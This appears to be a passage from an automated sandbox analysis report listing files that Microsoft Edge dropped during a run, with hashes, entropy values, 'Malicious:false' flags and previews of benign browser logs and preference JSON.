                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:24:TLqEeWOT/kIAoDJ84l5lDlnDMlRlyKDtM6UwccWfp15fBIe:T2EeWOT/nDtX5nDOvyKDhU1cSB
                                                                                                                                                                                                                  MD5:DEA619BA33775B1BAEEC7B32110CB3BD
                                                                                                                                                                                                                  SHA1:949B8246021D004B2E772742D34B2FC8863E1AAA
                                                                                                                                                                                                                  SHA-256:3669D76771207A121594B439280A67E3A6B1CBAE8CE67A42C8312D33BA18854B
                                                                                                                                                                                                                  SHA-512:7B9741E0339B30D73FACD4670A9898147BE62B8F063A59736AFDDC83D3F03B61349828F2AE88F682D42C177AE37E18349FD41654AEBA50DDF10CD6DC70FA5879
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):80
                                                                                                                                                                                                                  Entropy (8bit):3.4921535629071894
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:3:S8ltHlS+QUl1ASEGhTFljl:S85aEFljl
                                                                                                                                                                                                                  MD5:69449520FD9C139C534E2970342C6BD8
                                                                                                                                                                                                                  SHA1:230FE369A09DEF748F8CC23AD70FD19ED8D1B885
                                                                                                                                                                                                                  SHA-256:3F2E9648DFDB2DDB8E9D607E8802FEF05AFA447E17733DD3FD6D933E7CA49277
                                                                                                                                                                                                                  SHA-512:EA34C39AEA13B281A6067DE20AD0CDA84135E70C97DB3CDD59E25E6536B19F7781E5FC0CA4A11C3618D43FC3BD3FBC120DD5C1C47821A248B8AD351F9F4E6367
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:*...#................version.1..namespace-..&f.................&f...............
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):426
                                                                                                                                                                                                                  Entropy (8bit):5.2352141869997455
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:12:7o7Q+vVaYebvqBZFUt8OogGKW/+OovQV5OaYebvqBaJ:7o75VaYebvyg8OogGKWovSOaYebvL
                                                                                                                                                                                                                  MD5:AAD391048F97565915130968F792479C
                                                                                                                                                                                                                  SHA1:F5FA464D5230CEE6B2D60829E97F4A1070F885F2
                                                                                                                                                                                                                  SHA-256:1304E082C674E4EF00590B7DD3C9DFD22595AB689AD7367983E3A2003F5550B2
                                                                                                                                                                                                                  SHA-512:74EED47AF6C3EEB1B427FBAA54AB465FB0E3A451DB50B36F4F428270E4B7AC4BDC6C27C5823C8BA955AE72313C234D7A296BEA9C7C3968FB27FF64797E40FB3B
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:2024/12/18-15:06:28.735 1eec Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage/MANIFEST-000001.2024/12/18-15:06:28.736 1eec Recovering log #3.2024/12/18-15:06:28.739 1eec Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage/000003.log .
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):332
                                                                                                                                                                                                                  Entropy (8bit):5.209864413295422
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:6:7PQKuljyq2PN723oH+TcwtpIFUt8OPQx011Zmw+OPQx0jRkwON723oH+Tcwta/Wd:7oZyvVaYebmFUt8Ooa/+OoyR5OaYebaQ
                                                                                                                                                                                                                  MD5:7797CA36B94414FD67F8FA8CBE93E5FF
                                                                                                                                                                                                                  SHA1:1ED93316AE82AA8D0BC584B106BD7B6D6E1962FD
                                                                                                                                                                                                                  SHA-256:FBBF2686368E90BC75CDF77B7FD887DD36BD44B1F9D9EEC7F8FB114A179EF427
                                                                                                                                                                                                                  SHA-512:8D150DB85D59ECF4E6B6EE82AE6FC7DA95060B6B2DD1BAECD856E19177E5F47E7698DE0E13DE27EE3B4FD43BF894744B12C9C7144A7243C3CFEF6BDB30DBFF65
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:2024/12/18-15:06:08.287 1e70 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB/MANIFEST-000001.2024/12/18-15:06:08.479 1e70 Recovering log #3.2024/12/18-15:06:08.479 1e70 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB/000003.log .
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):131072
                                                                                                                                                                                                                  Entropy (8bit):0.0032209707218004476
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:3:ImtVuXhLOOlSl1:IiVux
                                                                                                                                                                                                                  MD5:AF7F821DDDEE6956B3DFBF0C2F4220AE
                                                                                                                                                                                                                  SHA1:F3A08F790A5E546166241635F3B4B7BC515CAF05
                                                                                                                                                                                                                  SHA-256:C366F8D1C0EA5C44FA70D592F8A7BE7116752694E484B9958893B4E615FADBA0
                                                                                                                                                                                                                  SHA-512:5531BC37E3029ADE3B3298372EB799B4B84FE555C395C32F9FC8FECB39080FE97DBAA2838C9E65BBC2C1EB1A3073720F28B7CF60D20D50A79B48F4DBC553E9F5
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 10, database pages 91, cookie 0x37, schema 4, UTF-8, version-valid-for 10
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):196608
                                                                                                                                                                                                                  Entropy (8bit):1.2675020022946544
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:384:L/2qOB1nxCkMQSA1LyKOMq+8iP5GDHP/0jMVumuw:Kq+n0JQ91LyKOMq+8iP5GLP/0pw
                                                                                                                                                                                                                  MD5:54001ECAD973EB9FA2B91AD75B1BECDD
                                                                                                                                                                                                                  SHA1:1E6E8166B4C95832ADE66580D41C59BA9B0D998E
                                                                                                                                                                                                                  SHA-256:BFD521EA2DB186407AA0969533192B03E16B86BF8508A677FA9C24DC1F32F6A4
                                                                                                                                                                                                                  SHA-512:BBB0C925A602B371FCC2FB30A9F4D04C909A31BF6D109165D5720E977691760EA9955CC82529B280533E80840772B1FF4ED45AEB5C5765272B672D01204548E6
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 10, cookie 0x7, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):40960
                                                                                                                                                                                                                  Entropy (8bit):0.41235120905181716
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:48:Tnj7dojKsKmjKZKAsjZNOjAhts3N8g1j3UcB:v7doKsKuKZKlZNmu46yjx
                                                                                                                                                                                                                  MD5:981F351994975A68A0DD3ECE5E889FD0
                                                                                                                                                                                                                  SHA1:080D3386290A14A68FCE07709A572AF98097C52D
                                                                                                                                                                                                                  SHA-256:3F0C0B2460E0AA2A94E0BF79C8944F2F4835D2701249B34A13FD200F7E5316D7
                                                                                                                                                                                                                  SHA-512:C5930797C46EEC25D356BAEB6CFE37E9F462DEE2AE8866343B2C382DBAD45C1544EF720D520C4407F56874596B31EFD6822B58A9D3DAE6F85E47FF802DBAA20B
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (3951), with CRLF line terminators
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):11755
                                                                                                                                                                                                                  Entropy (8bit):5.190465908239046
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:192:hH4vrmqRBB4W4PoiUDNaxvR5FCHFcoaSbqGEDI:hH4vrmUB6W4jR3GaSbqGEDI
                                                                                                                                                                                                                  MD5:07301A857C41B5854E6F84CA00B81EA0
                                                                                                                                                                                                                  SHA1:7441FC1018508FF4F3DBAA139A21634C08ED979C
                                                                                                                                                                                                                  SHA-256:2343C541E095E1D5F202E8D2A0807113E69E1969AF8E15E3644C51DB0BF33FBF
                                                                                                                                                                                                                  SHA-512:00ADE38E9D2F07C64648202F1D5F18A2DFB2781C0517EAEBCD567D8A77DBB7CB40A58B7C7D4EC03336A63A20D2E11DD64448F020C6FF72F06CA870AA2B4765E0
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:{.. "DefaultCohort": {.. "21f3388b-c2a5-4791-8f6e-a4cad6d17f4f.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.BingHomePage.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Covid.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Finance.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Jobs.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.KnowledgeCard.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Local.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.NTP3PCLICK.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.NotifySearchPage.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Recipe.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.SearchPage.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Sports.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Travel.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Weather.Bubble": 1,.. "2cb2db96-3bd0-403e-abe2-9269b3761041.Bubble": 1,.
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 7, cookie 0x4, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):28672
                                                                                                                                                                                                                  Entropy (8bit):0.3410017321959524
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:12:TLiqi/nGb0EiDFIlTSFbyrKZb9YwFOqAyl+FxOUwa5qgufTJpbZ75fOSG:TLiMNiD+lZk/Fj+6UwccNp15fBG
                                                                                                                                                                                                                  MD5:98643AF1CA5C0FE03CE8C687189CE56B
                                                                                                                                                                                                                  SHA1:ECADBA79A364D72354C658FD6EA3D5CF938F686B
                                                                                                                                                                                                                  SHA-256:4DC3BF7A36AB5DA80C0995FAF61ED0F96C4DE572F2D6FF9F120F9BC44B69E444
                                                                                                                                                                                                                  SHA-512:68B69FCE8EF5AB1DDA2994BA4DB111136BD441BC3EFC0251F57DC20A3095B8420669E646E2347EAB7BAF30CACA4BCF74BD88E049378D8DE57DE72E4B8A5FF74B
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):12933
                                                                                                                                                                                                                  Entropy (8bit):5.270978250490859
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:192:stFJ99QTryDigabatSuyAsa0JaFvrEkL1ikurx3G88bV+FiAn3/PrYJ:stFPGKSu7sa0JCDNL1Ar+bGiM3w
                                                                                                                                                                                                                  MD5:2ED03CA3BBC6B1FC5E1B9233AC95ECF2
                                                                                                                                                                                                                  SHA1:65BB88798D81FE0D36533C886F443DB76FD362C8
                                                                                                                                                                                                                  SHA-256:B887EC53E5B20C0264289FFD1854AD19BDF81AEE1A0E8505C6E2D3589AEB8CD9
                                                                                                                                                                                                                  SHA-512:F0B51389921BD5E74077A1A17B29C7A08B31D062B6C9DA9E1D78D5D9D45BA7535270C8F875D767EF22D9EEA23CA33A88655F25B388A74CBE901907C91147EF3B
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13379025969301478","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340961151815957","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"history_in_shoreline_activated":true,"hub_app_non_synced_preferences":{"apps":{"06be1ebe-f23a-4bea-ae45-3120ad86cfea":{"last_path":""},"0c835d2d-9592-4c7a-8d0a-0e283c9ad3cd":{"last_path":""},"168a2510-04d5-473e-b6a0-828815a7ca5f":{"last_path":""},"1ec8a5a9-971c-4c82-a104-5e1a259456b8":{"last_path":""},"2354565a-f412-4654-b89c-f92eaa9dbd20":{"last_path":""},"25fe2d1d-e934-482a-a62f-ea1705db905d":{"last_path":""},"2caf0cf4-ea42-4083-b928-29b39da1182b":{"last_path":""},"2cb2db96-3bd0-403e-abe2-9269b3761041":{"last_path":""},"35a43603-bb38-4b53-ba20-932cb9117
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (1597), with CRLF line terminators
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):115717
                                                                                                                                                                                                                  Entropy (8bit):5.183660917461099
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:1536:utDURN77GZqW3v6PD/469IxVBmB22q7LRks3swn0:utAaE2Jt0
                                                                                                                                                                                                                  MD5:3D8183370B5E2A9D11D43EBEF474B305
                                                                                                                                                                                                                  SHA1:155AB0A46E019E834FA556F3D818399BFF02162B
                                                                                                                                                                                                                  SHA-256:6A30BADAD93601FC8987B8239D8907BCBE65E8F1993E4D045D91A77338A2A5B4
                                                                                                                                                                                                                  SHA-512:B7AD04F10CD5DE147BDBBE2D642B18E9ECB2D39851BE1286FDC65FF83985EA30278C95263C98999B6D94683AE1DB86436877C30A40992ACA1743097A2526FE81
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:{.. "current_locale": "en-GB",.. "hub_apps": [ {.. "auto_show": {.. "enabled": true,.. "fre_notification": {.. "enabled": true,.. "header": "Was opening this pane helpful to you?",.. "show_count": 2,.. "text": "Was opening this pane helpful to you?".. },.. "settings_description": "We'll automatically open Bing Chat in the sidebar to show you relevant web experiences alongside your web content",.. "settings_title": "Automatically open Bing Chat in the sidebar",.. "triggering_configs|flight:msHubAppsMsnArticleAutoShowTriggering": [ {.. "show_count_basis": "signal",.. "signal_name": "IsMsnArticleAutoOpenFromP1P2",.. "signal_threshold": 0.5.. } ],.. "triggering_configs|flight:msUndersidePersistentChat": [ {.. "signal_name": "IsUndersidePersistentChatLink",.. "signal_threshold": 0.5.. } ],.. "triggering_co
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  File Type:very short file (no magic)
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):1
                                                                                                                                                                                                                  Entropy (8bit):0.0
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:3:L:L
                                                                                                                                                                                                                  MD5:5058F1AF8388633F609CADB75A75DC9D
                                                                                                                                                                                                                  SHA1:3A52CE780950D4D969792A2559CD519D7EE8C727
                                                                                                                                                                                                                  SHA-256:CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
                                                                                                                                                                                                                  SHA-512:0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):12769
                                                                                                                                                                                                                  Entropy (8bit):5.273147156902515
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:192:stFJ99QTryDigabatSuyAsa0JaFvrEkL1ikurx3G88bV+FiAxU/PrYJ:stFPGKSu7sa0JCDNL1Ar+bGiPw
                                                                                                                                                                                                                  MD5:E77E11970BEB6695C4D625D5C1971D6A
                                                                                                                                                                                                                  SHA1:7A07A5F63CAF0A5973E470F83661219C312CEC50
                                                                                                                                                                                                                  SHA-256:8BE3675D2439972E2EBE9292A7E3E281E1B97109619CF10348364F3265083B33
                                                                                                                                                                                                                  SHA-512:56EAD1C12575AB4AF079FD16403B763E0CD4FD6CEC8DFF18E804B5126308B2DDD34A2B3EB23AF5A108554EE9B90F65558D72164B3AF9D9EAFF39D172EC66C9D9
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13379025969301478","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340961151815957","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"history_in_shoreline_activated":true,"hub_app_non_synced_preferences":{"apps":{"06be1ebe-f23a-4bea-ae45-3120ad86cfea":{"last_path":""},"0c835d2d-9592-4c7a-8d0a-0e283c9ad3cd":{"last_path":""},"168a2510-04d5-473e-b6a0-828815a7ca5f":{"last_path":""},"1ec8a5a9-971c-4c82-a104-5e1a259456b8":{"last_path":""},"2354565a-f412-4654-b89c-f92eaa9dbd20":{"last_path":""},"25fe2d1d-e934-482a-a62f-ea1705db905d":{"last_path":""},"2caf0cf4-ea42-4083-b928-29b39da1182b":{"last_path":""},"2cb2db96-3bd0-403e-abe2-9269b3761041":{"last_path":""},"35a43603-bb38-4b53-ba20-932cb9117
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):32768
                                                                                                                                                                                                                  Entropy (8bit):0.049424530376406366
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:6:Gd0ddi8gd0ddi8CL9XCChslotGLNl0ml/XoQDeX:zddHgiddH6pEjVl/XoQ
                                                                                                                                                                                                                  MD5:A364C70716DAB97A286A97ECB635F581
                                                                                                                                                                                                                  SHA1:49202B67B6224CF97962C1D475B27F447CC165A2
                                                                                                                                                                                                                  SHA-256:385C027302FE4F0D60A58C6908C242124B3BB4F8FF63880F05CCF1443EA911B2
                                                                                                                                                                                                                  SHA-512:BAD7427D21D2E8F1A40D7CCA53508B05F07626C5BC37987BE905F01DA5B080692A3F02A758C8496B3C5424B8E0DF5D69A30CD39D393000E571E7CE71EC9B1888
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):694
                                                                                                                                                                                                                  Entropy (8bit):3.558824786692725
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:12:p9lc8QyOuuuuuuuuuuuuuuuuuuuuuKllGIs8u:pHay8lZc
                                                                                                                                                                                                                  MD5:425A93FEFB66D017C6AE9B8CFCBF96F1
                                                                                                                                                                                                                  SHA1:151381A4AEF750D769F342BFD589710F453F9F7F
                                                                                                                                                                                                                  SHA-256:412F844B5C2F6E865D8F3E03C78FF465ADD9EABFF87EE7479673D33BCCBB1155
                                                                                                                                                                                                                  SHA-512:D2F74AE5A05D2CEB6D2CA15FDD7B697125EA109123BCE01D0C7606E3846F701AB35AA526D58557D9E6ACF295C5EF6DB7B2142A80EB8969FE8383EA3E0427A5F2
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):328
                                                                                                                                                                                                                  Entropy (8bit):5.263776333834036
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:6:7PQp+q2PN723oH+TcwtfrK+IFUt8OPQFZmw+OPQgNVkwON723oH+TcwtfrUeLJ:7okvVaYeb23FUt8OoF/+Oos5OaYeb3J
                                                                                                                                                                                                                  MD5:BF46BABC77C1F923039067E327F1C29D
                                                                                                                                                                                                                  SHA1:659632C2294556E51490D87ED12C718B0D15E023
                                                                                                                                                                                                                  SHA-256:0658413E642E0569AC5C59FCE1208930D3E397F0FAC18E6AB1FC9976B9D16203
                                                                                                                                                                                                                  SHA-512:D35CD99D7664244702C40CC5D8C6152777828EE1A52A8F44C8338DE88EACE7650D779A25E1698C316BB8C2161174D461EA5C31B3ABCCC8CC6B87FEB20ACE7FE5
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:2024/12/18-15:06:09.375 1e48 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db/MANIFEST-000001.2024/12/18-15:06:09.375 1e48 Recovering log #3.2024/12/18-15:06:09.376 1e48 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db/000003.log .
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):816
                                                                                                                                                                                                                  Entropy (8bit):4.0647916882227655
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:12:G0nYUtTNop//z32m5t/yVf9HqlIZfkBA//DtKhKg+rOyBrgxvB1ySxs:G0nYUtypD32m3yWlIZMBA5NgKIvB8Sxs
                                                                                                                                                                                                                  MD5:3BE72D8D40752B3A97028FDB2931FABA
                                                                                                                                                                                                                  SHA1:A27EA4726857A948F0A4B074062B674469A9A371
                                                                                                                                                                                                                  SHA-256:3C18553C8C3F7E801855F3579AC57F3C156D783BBA27FB35C6D2FB6CB89BD902
                                                                                                                                                                                                                  SHA-512:8EBD4D6980BB7796615217E72BC65953C920B68B9259341CD52858C1E889EC90339E2A304FE0C971D6C6EF9AFC4A00CFB3E5CC89C7B2DF8737A0C7EC241BDADC
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.h.6.................__global... .t...................__global... .9..b.................33_..........................33_........v.................21_.....vuNX.................21_.....<...................20_.....X...................20_.....W.J+.................19_......qY.................18_.....'}2..................37_.......c..................38_......i...................39_.....Owa..................20_.....4.9..................20_.....B.I..................19_..........................18_.....2.1..................37_..........................38_......=.%.................39_.....p.j..................9_.....JJ...................9_.....|.&R.................__global... ./....................__global... ..T...................__global... ...G..................__global... ......................__global... .
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):346
                                                                                                                                                                                                                  Entropy (8bit):5.23546134021952
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:6:7PQ1+q2PN723oH+TcwtfrzAdIFUt8OPQMXZmw+OPQM3VkwON723oH+TcwtfrzILJ:7oAvVaYeb9FUt8OoMX/+OoMF5OaYeb2J
                                                                                                                                                                                                                  MD5:72508F0EC1271E02BF24519153DA77AD
                                                                                                                                                                                                                  SHA1:6B0145FC957797867EC4D78F38A02D4AA20C15A9
                                                                                                                                                                                                                  SHA-256:7E7D9F36439CF53400662E512605757EAAB2A5869628F2D5839AF725C1456025
                                                                                                                                                                                                                  SHA-512:A4323DD13FC4FFCA3A1D5C2B6094658910370ED51E4319ED533DBB9F2831B89B08D1C2F6AF422B5CBDE446B77C1FA03A30C92A1EEA16B4AC96543DA6E85ADDEF
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:2024/12/18-15:06:09.371 1e48 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata/MANIFEST-000001.2024/12/18-15:06:09.372 1e48 Recovering log #3.2024/12/18-15:06:09.372 1e48 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata/000003.log .
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):120
                                                                                                                                                                                                                  Entropy (8bit):3.32524464792714
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:3:tbloIlrJFlXnpQoWcNylRjlgbYnPdJiG6R7lZAUAl:tbdlrYoWcV0n1IGi7kBl
                                                                                                                                                                                                                  MD5:A397E5983D4A1619E36143B4D804B870
                                                                                                                                                                                                                  SHA1:AA135A8CC2469CFD1EF2D7955F027D95BE5DFBD4
                                                                                                                                                                                                                  SHA-256:9C70F766D3B84FC2BB298EFA37CC9191F28BEC336329CC11468CFADBC3B137F4
                                                                                                                                                                                                                  SHA-512:4159EA654152D2810C95648694DD71957C84EA825FCCA87B36F7E3282A72B30EF741805C610C5FA847CA186E34BDE9C289AAA7B6931C5B257F1D11255CD2A816
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):13
                                                                                                                                                                                                                  Entropy (8bit):2.6612262562697895
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:3:NYLFRQZ:ap2Z
                                                                                                                                                                                                                  MD5:B64BD80D877645C2DD14265B1A856F8A
                                                                                                                                                                                                                  SHA1:F7379E1A6F8CE062E891C56736C789C7EA77CD6A
                                                                                                                                                                                                                  SHA-256:83476CEEEB7682F41030664B4E17305986878D14E82D0C277FB99EC546B44569
                                                                                                                                                                                                                  SHA-512:734A7316A269C76DD052D980CC0D5209C0BFEDFFC55B11C58FA25C433CE8A42536827298C3E58CACD68CC01593C23D39350E956E8DE2268D8D29918E1F0667F2
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:117.0.2045.55
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):44455
                                                                                                                                                                                                                  Entropy (8bit):6.0898099391956055
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:768:+DXzgWPsj/qlGJqIY8GB4kWhdi1zNtPM9kzZ7okEt9r1JDSgzMMd6qD47u3+CioC:+/Ps+wsI7ynDakzItSmd6qE7lFoC
                                                                                                                                                                                                                  MD5:20C795342913839527D56EAFDBDCDF7C
                                                                                                                                                                                                                  SHA1:7C35DD4059D2B95B9C0E8B59DB276872D25EEC57
                                                                                                                                                                                                                  SHA-256:4C2D6DD186E270408481E332DEBD118038C3798FE780027CBA8740272F574238
                                                                                                                                                                                                                  SHA-512:93E4881DA8E806B32DDC55B0FC7EF3F808270BC9BEF69BBD779BE9E3E0EB21576EF5BD4ED15FB3C89F8A063D3A49C63A34EA4D7A2CD27F351C1895A3BA2476AD
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","apps_count_check_time":"13340961226065099","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"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
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  File Type:JSON data
